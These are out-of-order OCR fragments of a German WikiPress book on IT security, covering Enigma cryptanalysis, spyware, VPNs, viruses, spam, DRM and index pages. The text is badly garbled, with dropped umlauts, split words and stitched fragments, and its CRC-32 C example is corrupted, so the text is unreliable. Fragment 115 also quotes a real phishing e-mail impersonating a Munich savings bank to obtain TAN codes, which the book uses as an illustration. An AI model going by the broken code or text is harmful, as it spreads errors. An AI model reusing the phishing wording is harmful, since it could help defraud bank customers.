114. und brachte dann die Walzen in die angegebene Ausgangsstel lung zur Entschl sselung der eigentlichen Nachricht Rejewski entwickelte zudem einen Katalog mit Fingerabdr cken aller Walzenkombinationen und einstellungen Diese Spezialmethode kam v llig ohne Klartextkenntnisse aus Nachdem sp ter h ufige Schl s selwechsel vorgenommen wurden wurde sie jedoch nutzlos Der Spruch schl ssel war einer der kryptologischen Fehler der Deutschen ein weiterer schwerwiegender war die vollst ndige Wiedergabe einer Klartext Schl s sel Schl sseltext Kombination in fr hen Ausgaben der Bedienungsanlei tung welche die Struktur der Walzen erschlie bar machte Ferner wur 309 Kryptografie den unzweckm ige Bedienungen seitens der Funker ausgenutzt so als jemand auf die Bitte ein Testsignal zu senden 50 mal den Buchstaben A bermittelte was leicht erkennbar war Dem polnischen Geheimdienst stand au erdem erbeutetes deutsches Schl sselmaterial zur Verf gung Codeb cher wodurch der L sungsaufwand verringert wurde Den Klartext erhielt man nur wenn man folgende Teilprobleme l ste Aufkl rung von vorher Struktur und Verschaltung aller Walzen in klusive Umkehrwalze dann Spruchschl ssel Tagesschl ssel bestehend aus Walzenlage Ringstellung Grundstellung Steckerverbindungen Mit Hilfe elektromechanischer Rechenmaschinen so genannten Bom ben konnte innerhalb von Stunden der Tagesschl ssel e
115. von den Kunden der Stadtsparkasse M nchen durchzuf hren Der Sicherheitsdienst von der Stadtsparkasse Munchen hat die Entscheidung getroffen ein neues Datensicherheitssystem einzuf hren Im Zusammenhang damit wurden von unseren Fachleuten sowohl die Protokolle der Informations bertragung als auch die Methode der Kodierung der bertragenen Daten neu erstellt Infolgedessen bitten wir Sie eine spezielle Form der zus tzlichen Autorisation auszuf llen Diese Sicherheitsregeln wurden nur zum Schutz der Interessen von unseren Kunden eingesetzt Danke f r Ihre Zusammenarbeitarbeit Administration der Stadtsparkasse M nchen 2005 Stadtsparkasse M nchen Abb 18 Aktuelle Phishing E Mail 234 Phishing Anfang 2005 wurde eine Spam E Mail mit folgendem Wortlaut ver schickt Sehr geehrter Kunde Wir sind erfreut Ihnen mitzuteilen dass Internet Ueberweisungen ueber unsere Bank noch sicherer geworden sind Leider wurde von uns in der letzten Zeit trotz der Anwendung von den TAN Codes eine ganze Reihe der Mitteldiebstaehle von den Konten unserer Kunden durch den Internetzugriff festgestellt Zur Zeit kennen wir die Methodik nicht die die Missetaeter f r die Ent wendung der Angaben aus den TAN Tabellen verwenden Um die Missetaeter zu ermitteln und die Geldmittel von unseren Kunden unversehrt zu erhalten haben wir entschieden aus den TAN Tabellen von unseren Kunden zwei aufeinanderfolgenden Codes zu entfernen Dafuer mues
116. waren in ganz Europa vielf ltige Geheimschriften zum Schutz des diploma tischen Briefverkehrs in Gebrauch so etwa das Alphabetum Kaldeorum Sowohl Kryptografie als auch Kryptoanalyse spielt eine Rolle im Ba bington Komplott w hrend der Regierungszeit von K nigin Elizabeth I Die Anf nge der mathematischen Kryptografie wurden in dieser Zeit mit der Erzeugung von schl sselgest tzten Zeichenaustauschalgorithmen gemacht Ende des 19 Jahrhunderts kam es aufgrund der weiten Verbreitung des Telegrafen den man aufeinfache Weise anzapfen und abh ren konnte zu neuen berlegungen in der Kryptografie So wurde von Auguste Kerck hoffs von Nieuwenhof ein Grundsatz das nach ihm benannte Kerckhoffs Prinzip formuliert der besagt dass die Sicherheit eines kryptografischen Verfahrens allein auf der Geheimhaltung des Schl ssels basieren soll das Verfahren selbst muss also nicht geheimgehalten werden im Gegenteil Es kann ver ffentlicht und von vielen Experten untersucht werden Kryptografie im Zweiten Weltkrieg Im Zweiten Weltkrieg wurden mechanische und elektromechanische T52 SZ42 Kryptografiesysteme zahlreich eingesetzt auch wenn in Be reichen wo dies nicht m glich war weiterhin manuelle Systeme verwen det wurden In dieser Zeit wurden gro e Fortschritte in der mathemati schen Kryptografie gemacht Notwendigerweise geschah dies jedoch nur im Geheimen Die Deutschen machten regen Gebrauch von einem als Enigma be kannten System w
117. wird im Gegensatz zu Viren auch von Unternehmen pro grammiert Mitunter werden ganze Entwicklungsabteilungen damit be 106 Adware auftragt Diese Spyware hat demzufolge oft ein sehr hohes technisches Niveau Beispielsweise sch tzt sich Spyware gegen L schung dadurch dass mehrere Prozesse gleichzeitig laufen die bei Beendigung gleich wie der einen neuen aufmachen und sich selbst kopieren Auf der Festplatte entziehen sie beispielsweise dem Administrator die Schreib und damit die L schberechtigung usw Ein weiteres Problem entsteht dadurch dass Spyware zus tzliche Sicherheitsl cher in einem System erzeugen kann gegen die es dann auch keine Software Updates gibt Durch diese Verfahren wird es selbst einem technisch versierten User extrem schwer gemacht sich dieser Spyware zu entledigen Seit l ngerem haben sich Antivirensoftware Hersteller des Problems angenommen und auch L sungen gegen Spyware entwickelt Quelle http de wikipedia org wiki Spyware Historie 20 8 03 Anonym angelegt danach bearbeitet von den Hauptautoren LosHawlos Liquidat Tsukasa Bert2 MichaelDiederich Urbanus Botteler Steven Malkovich AchimP Melancholie Sciurus Eskimbot anonym 12 1 06 1 2 06 WikiPress Redaktion Adware Als Adware Kunstwort aus engl advertising Werbung und softwa re bezeichnet man blicherweise kostenlose und funktionell unein geschr nkte Software die dem Benutzer zus tzlich zur eigentlichen Funktionalit t
118. zum Beispiel zwei weit entfernte Standorte einer Firma verbin den Site to Site VPN Es ist auch m glich dass ein Tunnel zwischen zwei einzelnen Computern aufgebaut wird Dies wird praktisch aber kaum gemacht Nur Organi sationen mit einem extrem hohen Sicherheitsbed rfnis verschl sseln so die gesamte Kommunikation in ihren Netzen FreeS WAN sowie dessen Nachfolger Openswan und strongSwan bieten noch die M glichkeit der so genannten opportunistic encryption Es wird zu jedem Rechner mit dem der eigene Computer Daten austauscht ein Tunnel aufgebaut wenn dieser einen Schl ssel per DNS bereitstellt 256 Pr fsumme Sicherheit Durch Verwendung geheimer Passw rter ffentlicher Schl ssel oder Zer tifikate kann die Authentifizierung der VPN Endpunkte gew hrleistet werden Es ist sinnvoll auf den VPN Gateways den Datenverkehr zu filtern Sonst ist es zum Beispiel Computerw rmern m glich sich im gesamten Netz zu verbreiten Gute VPN Software verwendet Authentizit t und Pr fsummen um sich vor Manipulation der Daten zu sch tzen Ebenso werden Sequenz nummern benutzt um Replay Attacken zu verhindern Implementierungen G ngige Techniken zum Aufbau von VPNs sind PPTP IPsec SSL Open VPN CIPE und PPP ber SSH VPNs setzen auf folgenden zugrundeliegenden Protokollen auf IPsec eignet sich sowohl f r Site to Site VPNs als auch f r End to Site VPNs TLS SSL werden haupts chlich f r End to Site VPNs eingesetzt
119. zusammen mit mindestens f nf Hauptautoren des Dokuments alle Hauptautoren wenn es weniger als f nf sind es sei denn diese befreien Sie davon C Nennen Sie auf der Titelseite den Namen des Herausgebers der modifizierten Version in seiner Funktion als Herausgeber Alle Copyright Hinweise des Dokuments m ssen erhalten bleiben F gen Sie einen passenden Copyright Hinweis f r Ihre Ver nderungen direkt nach den anderen Copyright Hinweisen hinzu Schlie en Sie direkt nach den Copyright Hinweisen einen Lizenzhinweis an der die Genehmigung erteilt die modifizierte Version unter den Bedingungen dieser Lizenz zu nutzen wie im Anhang weiter unten beschrieben In diesem Lizenzhinweis m ssen die vollst ndigen Listen der unver nderlichen Abschnitte und erforderlichen Umschlagtexte erhalten bleiben die im Lizenzhinweis des Dokuments aufgef hrt sind F gen Sie eine unver nderte Kopie dieser Lizenz ein Der Abschnitt Historie muss erhalten bleiben ebenso sein Titel F gen Sie einen Eintrag hinzu der mindestens den Titel das Jahr die neuen Autoren und den Herausgeber der modifizierten Version enth lt so wie sie auf der Titelseite erscheinen Sollte es keinen Abschnitt Historie im Dokument geben erstellen Sie einen der den Titel das Jahr die Autoren und den Herausgeber des Dokuments enth lt so wie sie auf der Titelseite erscheinen F gen Sie einen Punkt hinzu der die modifizierte Version beschreibt wie im vorherigen
120. 0 Next Generation Secure Computing Base 114 Nigeria Connection 192 203 NSA 269 O Offentlicher Schliissel 135 149 152 257 269 277 One Time Pad 282 Online Certificate Status Protocol 153 OpenPGP 136 142 279 Open Relay 194 197 Open Source 126 135 155 168 177 180 186 289 OSI Referenzmodell 89 239 244 251 319 P Paketfilter 57 58 82 87 89 90 91 94 95 98 105 257 Palladium 113 114 123 Passwort 11 74 168 212 228 257 271 286 290 293 Patch 26 56 70 226 Peer To Peer 49 50 54 61 65 Personal Firewall 27 56 57 63 75 89 94 PGP 134 140 146 150 186 277 Phishing 155 170 193 229 230 288 Phreaking 180 213 229 230 PKCS 151 152 PKI 140 150 Platform for Privacy Preferences 133 Point to Point Protocol 108 239 254 257 POP3 91 185 226 Port 64 69 70 89 92 95 101 206 Port Based Network Access Control 255 Poulsen Kevin 180 Pretty Good Privacy Siehe PGP Privater Schl ssel 152 269 Privatkopie 121 131 Proof of Concept 252 Index Propriet r 168 Proxy 77 91 92 106 202 Pr fsumme 84 250 254 257 259 266 Public Key Infrastruktur 136 137 140 149 152 Puffer berlauf 179 Q Quelltext 135 168 290 R Rabin Kryptosystem 279 280 Race Condition 179 RADIUS 241 252 253 254 255 RAM Random Access Memory 61 Raymond Eric S 180 RC4 240 248 250 252 253 277 290 319 Rechnernetz 21 22 50 87 89 94 108 1
121. 2 Pr fsumme in C Das folgende C Programm berechnet die CRC 32 des 8 Bits langen Daten stroms 10001100 include lt stdio h gt define CRC32POLY 0x04C11DB7 CRC 32 Polynom int datastream 1 0 0 0 1 1 0 0 int databits 8 unsigned long crc32 Shiftregister void calc _crc32 int bit int hbit crc32 amp 0x80000000 1 0 if hbit bit cerc32 crc32 lt lt 1 CRC32POLY else erc32 crc32 lt lt 1 erc32 amp Oxffffffff begrenze auf 32 Bits int main int i cere32 OxXf LL E ff Startwert 111 bei CRC 32 for i 0 i lt databits i calc crce32 datastream i printf 0x 08X cre32 Oxffffffff invertiere Ergebnis CRC 32 Implementierung in der Programmiersprache C CRC 32 ver wendet einen Startwert von 111 und invertiert das Ergebnis Polynome und Typen CRC CCITT CRC 4 xX x 1 CRC CCITT CRC 16 xt 4 x2 4x9 47 IBM CRC 16 x16 x1 x2 41 CRC 24 IETF RFC2440 xx 4 x4 x7 4x44 a HN HH HR 4x41 CRC 32 X32 4 26 4 x23 4 x22 4 x16 4 x12 4 xT 4 x10 4 x8 HN 4 XS 4 X44 X74 x41 CRC 64 ISO 3309 X44 x44 x3 4x41 CAN CRC x15 x14 x10 4 x8 4 x7 4 x4 4841 Bluetooth X 265 WLAN CRCs werden h ufig als Priifsummen bezeichnet obwohl die Berech nung der Kontrollbits nicht nur durch gew hnliche Addition geschieht Der Begriff Pr fsumme wurde zuerst im Zusammenhang mit Parit ts bits benutzt welche sich als eine echte Summe ber Z berechnen lassen
122. 4 03 Anonym angelegt danach bearbeitet von den Hauptautoren Klaus Jesper Hendrik vm Neil Carter Prussio Marko wiki DgInsw Kubieziel Steven Malkovich IP X Eldred MichaelDiederich AkaBot E7 Thomas05 Benni B rmann BWBot Zenogantner Stern Tsor Chrisfrenzel Ste ba Achim Raschka Smurf Southpark RedBot ErikDunsing anonym 12 1 06 1 2 06 WikiPress Redaktion Digital Rights Management Digital Rights Management digitale Rechteverwaltung abgekiirzt DRM ist ein Verfahren mit dem Urheber und Vermarktungsrechte an geistigem Eigentum vor allem an Film und Tonaufnahmen aber auch an Software oder elektronischen B chern im Computerzeitalter gewahrt sowie Abrech nungsm glichkeiten f r Lizenzen und Rechte geschaffen werden Kern problem ist die beliebige Kopierbarkeit von digitalen Inhalten ohne jeden Qualit tsverlust und ohne nennenswerten Aufwand Mausklick geniigt Die Bef rworter argumentieren dass mit DRM die bisherigen Zwangs abgaben zum Beispiel auf Leerkassetten und Fotokopierer an GEMA und VG Wort berfl ssig werden sowie Rechteinhabern und Benutzern neue Gesch ftsmodelle wie die Vermietung oder die Nutzung nach Dauer H u figkeit oder Umfang eine gerechtere Abrechnung erm glichen Kritiker warnen vor allem vor Datenschutzproblemen und m glichen Einschr n kungen bei der Benutzerfreundlichkeit und fairen Nutzung Digital Rights Management Systeme Es existiert derzeit keine einheitliche Definit
123. 48 CAN SPAM Act 205 Canceln 190 C sar Chiffre 282 CAST 128 256 277 Certificate Revocation List 141 143 149 Certification Authority 137 140 150 Chaos Computer Club 100 157 177 Chiffre 271 CIH Virus 49 Cipher Block Chaining Mode 257 283 291 Client 100 101 167 222 244 255 320 Cocks Clifford 278 Combo List 294 Common Gateway Interface 31 216 222 Computersicherheit 11 22 94 116 222 291 Computervirus 12 21 22 44 45 46 47 49 50 58 59 60 69 72 75 76 78 80 82 109 169 170 184 193 Computerwurm 21 22 48 49 50 62 64 65 68 70 73 76 78 80 95 100 109 193 206 209 210 257 Confirmed Opt in 198 Content Scrambling System 120 Cracker 83 95 170 171 175 177 214 CRC 259 Creative Commons 247 Cross Site Scripting 164 222 Cyclic Redundancy Check 249 250 258 D Daemen Joan 276 Data Encryption Standard 269 277 282 290 291 304 319 320 Datenschutz 11 14 20 109 117 133 154 156 157 162 Datensicherheit 11 15 18 20 109 116 154 DBi 243 DDoS Angriff 208 Defacement 212 Denial of Service 12 21 59 67 68 70 74 82 206 208 215 Dialer 21 74 80 108 Diffie Whitfield 269 278 Diffie Hellman Algorithmus 134 276 Digitales Zertifikat 140 142 149 150 279 Digitale Signatur 153 Digitale Unterschrift 149 Digital Millennium Copyright Act 130 Digital Rights Management 113 116 123 127 286 Disk Operating System 46 DomainKeys 187 337
124. 5 noch nicht be sonders weit verbreitet sind Update Viren infizieren nicht nur neue Dateien sondern ersetzen bei bereits infizierten Dateien alte Versionen von sich selbst durch die ak tuelle M gliche Sch den Payload Computerviren sind vor allem gef rchtet weil sie den Ruf haben s mtliche Daten zu zerst ren Das ist aber nur in sehr wenigen F llen richtig Die meisten Computerviren versuchen haupt s chlich sich selbst m glichst weit zu verbreiten und deswegen nicht auf zufallen Harmlose Auswirkungen Eine Eigenschaft die jedes Virus hat ist das Stehlen von Rechnerzeit und speicher Da ein Virus sich selbst verbrei tet benutzt es die Leistung des Prozessors und der Festplatten Viren sind aber im Normalfall so geschrieben dass sie f r das System keine sp rbare Beeintr chtigung darstellen so dass sie der Benutzer nicht erkennt Bei der Gr e aktueller Festplatten f llt auch der zus tzlich ben tigte Fest plattenplatz nicht mehr auf Ungewollte Sch den Programmierfehler Viele Computerviren ent halten Fehler welche unter gewissen Umst nden zu fatalen Folgen f hren k nnen Diese Fehler sind zwar meistens unbeabsichtigt k nnen jedoch Dateien durch eine falsche Infektion zerst ren oder gar in Einzelf llen ganze Datenbest nde vernichten Existenzbericht Meldungen an den Benutzer Manche Viren geben dem Benutzer ihre Existenz bekannt Beispiele f r Meldungen von Viren k nnen z B sein Piepsen M
125. 70 181 254 256 259 284 Referrer 190 Registration Authority 141 Regul re Ausdr cke 85 Rejewski Marian 309 Remote Procedure Call 52 70 Replay Attacke 257 320 Request for Comments 101 150 187 319 Reverse Engineering 171 173 Revokation 140 Rijmen Vincent 277 Ritchie Dennis 180 Rivest Roland L 277 279 290 Roberts Lawrence 182 Root 84 218 226 Rootkit 72 83 R ttgers Janko 181 Router 50 87 98 101 227 RPC DCOM Dienst 70 RSA 117 134 135 269 270 271 279 280 282 290 321 322 Rubiks Wiirfel 118 Ryan Thomas J 40 S S MIME 186 279 Sandbox 96 339 Anhang Sasser 59 68 95 99 Scherbius Arthur 295 Schl ssel 117 120 136 152 248 255 276 277 281 292 Schmidt Hans Thile 310 Schneier Bruce 14 277 289 Schulzki Haddouti Christine 19 Schumacher Markus 14 174 SCO Group 59 66 67 210 SEAL 291 Secure Shell 89 228 257 279 291 Secure Sockets Layer 228 Security through Obscurity 97 290 Selbstdatenschutz 154 Sen Evrim 174 181 Sender Policy Framework 187 206 Sendmail 13 60 Serial Line Internet Protocol 239 Session 165 Session Initiation Protocol 322 Shamir Adi 279 Shannon Claude 268 Short Message Service 48 Sicherheitsliicke 52 70 99 212 215 Signaturgesetz 186 SIM Karte 49 Simple Mail Transfer Protocol Siehe SMTP Skriptkiddie 95 169 170 173 175 Skriptsprache 23 105 171 222 231 Slipstreaming 103 SMS 48 SMTP 50 60 91 100 183 185 1
126. 89 222 User Datagram Protocol 65 V Validierungsdienst 141 Van Eck Phreaking 214 VeriSign 149 Verschiebechiffre 284 Verschl sselung 20 120 134 142 228 247 251 256 267 271 276 277 281 286 290 295 310 Vertraulichkeit 11 20 142 Virenscanner 47 57 90 110 Virtual Private Network 90 103 251 256 Visual Basic Script 42 47 VoIP 190 Vorratsdaten speicherung 16 156 VPN 251 256 WwW W32 Blaster 52 59 61 69 70 95 210 W32 Sobig F mm 64 W32 Sysser 68 Web Bug 163 Web of Trust 135 136 142 WEP 240 247 251 252 253 255 291 Wern ry Steffen 161 162 Whitelist 197 Wi Fi Protected Access 239 240 251 255 Williamson Malcolm 278 Wired Equivalent Privacy Siehe WEP Wireless LAN 212 227 239 247 250 251 252 253 254 255 256 291 WLAN 239 World Wide Web Consortium 133 W rterbuchangriff 252 287 289 292 293 WPA 253 X X 509 141 142 144 150 320 XOR 260 290 XSS 222 Z Zertifikat 118 137 149 152 228 233 257 320 Zertifikatsperrliste 151 152 Zertifizierungsstelle 149 Zimmermann Phil 134 Zorn Werner 183 Zuse Konrad 162 Zyklische Redundanzpr fung 240 254 259 Index 341 wie L0 ies Wikipedia Wikipedia Das Buch Mit der DVD ROM Wikipedia 2005 2006 WikiPress 1 272 Seiten 1 DVD ROM ISBN 3 86640 001 2 Lies kritisch Sei mutig Mach mit Wikipedia ist und bleibt faszinierend Dieses Buch ist das erste vo
127. 94 196 199 206 319 322 Smurf Attacke 215 Sniffer 73 74 Sobig F 64 65 Social Engineering 13 51 52 57 170 180 212 228 230 237 272 Spam 82 85 90 134 182 186 188 189 211 235 SpamAssassin 85 207 Spamfilter 85 90 104 195 Spamgourmet 195 Spoofing 155 213 340 Spyware 21 95 99 100 106 107 154 SQL Injektion 215 223 SSL 318 Stallman Richard 180 Stateful Inspection 91 97 Steganographie 90 267 Stephenson Neal 268 Stoll Clifford 14 174 177 225 Strawpoll 190 SubSeven 75 169 SUID 226 Symmetrisches Kryptosystem 137 276 277 282 320 SYN Flood 209 T T Hack 162 TCG 113 117 123 130 TCP 70 101 213 319 TCPA 75 113 117 122 123 126 Technische Kompromittierung 13 100 312 Teergrube 197 Temporal Key Integrity Protocol 251 253 Thompson Ken 180 TKIP 252 253 TLS 318 Tomlinson Ray 182 Top Level Domain 66 Torvalds Linus 180 TPM 116 117 125 130 Transmission Control Protocol Siehe TCP Transport Layer Security 150 254 257 318 Trojanisches Pferd 21 22 48 70 72 76 80 82 84 95 100 109 168 170 193 206 232 234 Tron 161 180 Trusted Computing Group Siehe TCG Trusted Computing Platform Alliance Siehe TCPA Trusted Platform Module Siehe TPM Trust Center 143 TSR Virus 47 Turing Alan 311 312 Twofish 277 282 U UCE 12 66 86 163 186 Unsolicited Bulk Email 12 66 163 186 205 URI 167 URL 162 233 URL Spoofing 222 Usenet 104 135 188 1
128. A5 Duesentrieb Achim Raschka Christoph D Klamsi Gree Evr StevenBusse Stefan h Eagletm Eike sauer Lichtkind Kju Tim Pritlove Muns Nerd Matt1971 Zwobot Daniel AT anonym 12 1 06 1 2 06 WikiPress Redaktion E Mail E Mail von engl electronic mail dt elektronische r Post Brief auch kurz Mail bezeichnet eine auf elektronischem Weg in Computernetz werken bertragene briefartige Nachricht Eindeutschungen wie E Brief oder E Post scherzhaft auch Strompost treffen bislang auf wenig Ak zeptanz Unklar ist schlie lich das zugeordnete grammatikalische Ge schlecht W hrend sich in sterreich und Deutschland vorwiegend die feminine Form durchgesetzt hat die Mail dominiert in der Schweiz das Neutrum das Mail 181 Sonstige Themen E Mail wird noch vor dem World Wide Web als wichtigster und meist genutzter Dienst des Internets angesehen Stand 2002 ber die H lfte des weltweiten E Mail Aufkommens im Internet ist allerdings seit ca 2002 auf Spam zur ckzuf hren Geschichte Vor dem Aufkommen von E Mail sss ee en wurden Nachrichten als Brief oder We Telegramm sp ter als Fernschrei ben und Telefax bermittelt Ende iS m DL wa der 1960er Jahre begann dann der rasen Siegeszug der E Mail sie war eine tiasa der ersten Anwendungen welche s die M glichkeiten des ARPANETs nutzte Die Einf hrung von E Mail wurde nicht gezieltgeplant sondern 2 aa m eroberte das
129. ANDODERWE 16 OBERKOMMANDODERWEHRM 17 OBERKOMMANDODERWEHR 18 OBERKOMMANDODERWEH 19 OBERKOMMANDODERWE 20 OBERKOMMANDODERWE 21 OBERKOMMANDODERWE 22 OBERKOMMANDODERWEHRM 23 OBERKOMMANDODERWEHRMACHT 24 OBERKOMMANDODERWEHRMACHT 25 OBERKOMMANDODERWEHRMACHT 26 OBERKOMMANDODERWEHRMACHT 27 OBERKOMMANDODERWEHRMACHT FMHVPFUIDPJOUCXRWGYFZBECTIDFXZOSIVIEGVCEDBZDTJCOXH Ki R Geht man von der Enigma I aus bei der drei Walzen aus einem Sortiment von f nf Walzen eingesetzt werden sowie eine von zwei m glichen Um kehrwalzen B oder C so ergeben sich 2 5 2 120 verschiedene Kombina tionsm glichkeiten f r die Walzenlage F r jede dieser Walzenlagen gibt es 26 also 17576 Grundstellungen Wenn man vom Steckerbrett absieht gibt 308 Enigma es nur 120 17576 also 2 109 120 M glichkeiten f r die Verschl sselung eines Textes Diese etwa zwei Millionen unterschiedlichen F lle sind von Hand in vern nftiger Zeit praktisch nicht durchzuprobieren Mit Hilfe ei ner geeigneten Maschine jedoch die motorbetrieben vielleicht zwanzig F l le pro Sekunde abarbeiten kann ben tigt man nur noch 2109120 20 60 60 also etwa 30 Stunden um s mtliche M glichkeiten durchzutesten Leistet man sich den Aufwand sechzig Maschinen also jeweils eine f r jede Wal zenlage ohne Umkehrwalzen einzusetzen dann
130. Anhang Domain Name System 13 67 91 96 150 187 206 209 228 256 Dom ne Domain 68 166 212 231 DoS Angriff 208 Draper John T 176 180 214 DRM 127 E E Mail 14 50 51 62 64 65 69 81 85 96 109 113 117 140 154 163 169 181 187 188 216 222 230 E Mail berwachung 187 EAP 240 241 251 252 254 255 Eckert Claudia 13 Einmalpasswort 287 EIRP 243 Elektronische Signatur 136 139 140 142 186 279 Elektronische Unterschrift 258 278 Elgamal Kryptosystem 135 279 280 Ellis James 278 Embedded System 129 Enigma 268 271 272 295 Entropie 288 Entschl sselung 276 277 281 285 Exploit 52 170 Extensible Authentication Protocol Siehe EAP F F Secure 49 79 Fiber Distributed Data Interface 262 File Transfer Protocol 23 60 69 89 91 101 182 188 292 Fingerprint 138 233 Firewall 13 21 50 68 87 95 96 Firmware 29 50 120 Form Virus 45 46 Freeware 79 104 126 177 Frequenzspreizung 242 G Gateway 87 256 GEMA 127 GEZ 169 Glaser Peter 162 338 GNU Privacy Guard 136 140 146 186 Guillaume Giinter 226 H Hacker 13 83 157 170 172 175 212 214 224 228 229 Hackerethik 160 170 176 Hagelin Boris 317 Handyvirus 48 Hash Funktion 85 124 259 289 295 320 Hash Wert 118 125 254 258 278 291 HBCI 233 Hellman Martin 269 278 Heringhaus Dirk 162 Hess Markus 180 224 225 Heuristik 78 81 Hijacking 212 Hintert r Siehe Backdoor Hoax 169 193
131. Arbeitsgruppe scheiterte aber letztendlich an ungekl rten Patentanspr chen von Seiten Microsofts Die verschiedenen Verfahren sollen nun in eigenen Verfahren als RFCs umgesetzt werden Quelle http de wikipedia org wiki E Mail Historie 16 11 01 Angelegt von Seef danach bearbeitet von den Hauptautoren Wikifh Stw Elian Stern Kinley NewImage Odino Geof Ernesto Ulrich fuchs Fgb Diddi Wer1000 Weede Finanzer ErhardRainer Harald Miihlbock Seef IGEL HenrikHolke Elshalif Walter Koch Chrisbra Learny Kleiner Frosch Anneke Wolf Vux Guillermo ChristianErtl Fomafix J mach wust Hubi Mac Nimmich Achim Raschka FutureCrash Zwobot Mxr OderWat DaB Vlado Yath ChristophDemmer Dishayloo Haize Steven Malkovich AT anonym 12 1 06 1 2 06 WikiPress Redaktion E Mail Uberwachung E Mail Uberwachung ist die konkrete Ausgestaltung der Uberwachung auf den Dienst E Mail Rechtslage in Deutschland Nach Telekommunikationsgesetz 110 und Telekommunikations Uber wachungsverordnung miissen seit dem Jahr 2005 alle Betreiber die Tele kommunikationsdienste fiir die Offentlichkeit anbieten d h 6ffentliche E Mail Server betreiben die mehr als 1 000 Teilnehmeranschliisse haben berwachungsbereit sein Das hei t Sobald eine E Mail berwachung angeordnet wird muss sie unverz glich durchgef hrt werden k nnen Dabei ist der Begriff Teilnehmeranschluss nicht klar definiert 187 Sonstige Themen Kosten
132. Australien war Vorreiter in Sachen Anti Spam Gesetzgebung und be drohte Spamming als erstes Land weltweit mit harten Strafen Allerdings hielt sich die Regierung ein Schlupfloch offen Parteienwerbung ist an ders als in Deutschland dort erlaubt Ausblick Im Kampf um gegen UBE wird von beiden Seiten ein immer gr er wer dender Aufwand getrieben 205 Sonstige Themen Das UBE Aufkommen stieg in den letzten Jahren exponentiell an Im Jahr 2003 berstieg das UBE Aufkommen erstmals die Menge der regul ren Mails so eine Meldung von spamhaus org Ende des Jahres Aufkommende neue Filter oder andere Techniken zur UBE Vermei dung werden durch entsprechende Gegenma namen umgangen Die berpr fung der G ltigkeit von Absenderadressen f hrte zur Verwendung g ltiger Adressen mit dem Effekt dass Unschuldige mit Tausenden bis zu Millionen von Bounces bersch ttet wur den Die Einf hrung von Filtern die Mails auf bestimmte Begriffe ber pr ften f hrte zu Mails die absichtliche Schreibfehler enthielten beispielsweise Vla9ra statt Viagra oder durch ung ltiges HTML das von HTML darstellenden Mailreadern ignoriert wird den wahren Inhalt verschleierten Das Sperren bekannter offener Relays und bekannter UBE versen dender Server f hrte zur Verbreitung von Trojanischen Pferden die die Rechner von regul ren Benutzern als UBE Versender um funktionierten Das Einf hren von zentralen Listen die Informationen ber
133. Autor Es hat ganz viele Wie Protocol e 253 GNU Free Documentation viele Das k nnen wir Ihnen nicht genau sagen Wir kennen zudem die IEEE 802 1x 254 License deutsch 331 wenigsten von ihnen Wir wissen nicht wo sie wohnen was sie beruflich Port Based Network Access Bildnachweis 336 machen wie alt sie sind oder was sie daf r qualifiziert dieses Buch zu Control e w e w295 Index wt y 337 schreiben Und noch was Wir glauben die meisten haben sich unterei Aircrack co a255 nander noch nie gesehen Dennoch begegnen sie sich regelm ig In der Virtual Private Network 256 Wikipedia der freien Enzyklop die Diese Wikipedia ist das bislang schillerndste Beispiel sogenannter Wikis einer neuartigen Form von In ternetseiten die es dem Leser erm glichen ihre Inhalte nicht mehr nur einfach zu konsumieren sondern sie spontan zu ver ndern Hierbei ist jedem der Zugang erlaubt Hobbyforschern und Lehrstuhlinhabern Fachstudenten und Sch lern Jugendlichen und Senioren Niemand muss seine Qualifikation nachweisen doch seine Beitr ge m ssen dem Urteil der Gemeinschaft standhalten sonst werden sie in k rzester Zeit wieder entfernt Das Faszinierende hierbei ist Das Prinzip funktioniert Vieles hat die Wikipedia mit den konventionellen Enzyklop dien ge meinsam Anderes hingegen unterscheidet sie deutlich von allen anderen Werken Befindet sich in einem Text in der Wikipedia ein Fehler so w
134. Bezeichnung Spam bezog sich urspr nglich auf das berfluten von Newsgroups im Usenet mit Werbebotschaften und wurde sp ter auf E Mails bertragen 188 Spam Begriffsherkunft Der Begriff entstammt einem Sketch der englischen Comedyserie Monty Python s Flying Circus In einem Cafe besteht die Speisekarte ausschlie lich aus Gerichten mit SPAM die SPAM teilweise mehrfach hinterein ander im Namen enthalten SPAM ist ein Markenname f r Dosenfleisch 1936 entstanden aus spiced ham f lschl auch spiced pork and meat ham Ein Gast verlangt nach einem Gericht ohne SPAM die Kellnerin empfiehlt ein Gericht mit wenig SPAM als sich der Gast aufregt f llt ein Chor aus Wikingern die die beiden anderen Tische besetzen mit einem Loblied auf SPAM ein bis der Sketch im Chaos versinkt Im anschlie enden Abspann wurden die Namen der Mitwirkenden ebenfalls um SPAM erg nzt Im Sketch wird das Wort Spam insgesamt knapp 100 mal erw hnt Arten von Spam Spam auch Junk Mail absch tziger Ausdruck f r den meist kommer ziellen Missbrauch des Internets zur massenweisen Verbreitung uner w nschter Werbung ber die Dienste E Mail News und Mailinglisten Das Ph nomen Spam hat seinen Ursprung im Usenet dort bezeichnet man damit wiederholte Artikel in den Newsgroups die substanziell gleich sind oder f r dieselbe Dienstleistung werben Unsolicited Bulk E mail zu deutsch Unverlangte Massen E Mail kurz UBE sind E Mails
135. CD gestartet werden bie ten nahezu vollst ndigen Schutz wenn keine Schreibgenehmigung f r die Festplatten erteilt wird Weil keine Ver nderungen an Festplatten vorgenommen werden k nnen kann sich kein sch dliches Programm auf der Festplatte einnisten Speicherresidente Malware kann aber auch bei solchen Live Systemen Schaden anrichten indem diese Systeme als Zwi schenwirt bzw Infektionsherd f r andere Computer dienen k nnen Mal ware die direkt im Hauptspeicher residiert wird erst bei einem Reboot unsch dlich gemacht Allgemeine Pr vention Bei Microsoft Betriebssystemen Anwender sollten niemals unbe kannte Dateien oder Programme aus unsicherer Quelle ausf hren und generell beim ffnen von Dateien Vorsicht walten lassen Das gilt insbe sondere f r Dateien die per E Mail empfangen wurden Solche Dateien auch eigentlich harmlose Dokumente wie Bilder oder PDF Dokumen te k nnen durch Sicherheitsl cken in den damit verkn pften Anwen dungen auf verschiedene Weise Schadprogramme aktivieren Daher ist 25 Viren W rmer Trojaner deren berpr fung mit einem aktuellen Antivirenprogramm zu emp fehlen Betriebssystem und Anwendungen sollten regelm ig aktualisiert wer den und vom Hersteller bereitgestellte Service Packs und Patches Hotfixes eingespielt werden Einige Betriebssysteme vereinfachen diese Prozedur indem sie das automatische Herunterladen und Installieren von Updates unterst tzen Manche unterst tz
